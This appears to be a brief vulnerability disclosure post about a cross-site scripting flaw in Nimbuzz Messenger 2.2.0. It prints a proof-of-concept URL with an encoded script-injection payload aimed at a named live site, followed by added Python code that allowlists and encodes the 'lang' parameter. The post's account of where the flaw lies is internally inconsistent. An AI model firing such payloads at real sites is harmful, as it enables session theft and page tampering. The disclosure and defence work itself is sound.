Cross Site Scripting vulnerability in Nimbuzz 2.2.0 Messenger


Grey hat hacker "Sony" has discovered a Cross Site Scripting vulnerability in Nimbuzz Messenger. According to his report, Nimbuzz version 2.2.0 is vulnerable to XSS.

The hacker found the vulnerability in Chat Window --> View in Browser (persistent code). The 'forget password' page was found to be vulnerable to XSS.

Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error

PoC:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
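
An added example (not part of the original report and not Nimbuzz's code) of handling the `lang` parameter defensively: an allowlist check followed by context-specific output encoding, run against the PoC URL above. The language list, the function names and the page template are assumptions made for illustration.

```python
import html
import json
from urllib.parse import parse_qs, urlsplit

# The PoC URL from the post, used here only as test input.
POC_URL = (
    r"http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//"
    r"\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//"
    r"\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E"
    r"%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E"
)

# Assumption: the set of UI languages is fixed and known; these codes are illustrative.
SUPPORTED_LANGS = {"en", "de", "es", "fr", "nl"}
DEFAULT_LANG = "en"


def lang_values(url):
    """All decoded values of the lang query parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("lang", [])


def pick_lang(url):
    """Allowlist check: anything but exactly one supported code falls back to the default."""
    values = lang_values(url)
    if len(values) == 1 and values[0] in SUPPORTED_LANGS:
        return values[0]
    return DEFAULT_LANG


def html_attr(value):
    """Encode for a quoted HTML attribute value."""
    return html.escape(value, quote=True)


def js_string(value):
    """Encode as a JS string literal that cannot close an inline <script> block."""
    out = json.dumps(value)  # handles ", \ and control characters
    for ch in "<>&'":  # json.dumps leaves these as-is
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out


def render_login(url):
    """Hypothetical template: encode per context even though lang is already allowlisted."""
    lang = pick_lang(url)
    return '<html lang="%s"><script>var lang = %s;</script></html>' % (
        html_attr(lang), js_string(lang))
```

The allowlist alone discards the PoC value; the two encoders are the second layer for any parameter that cannot be restricted to a fixed set.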
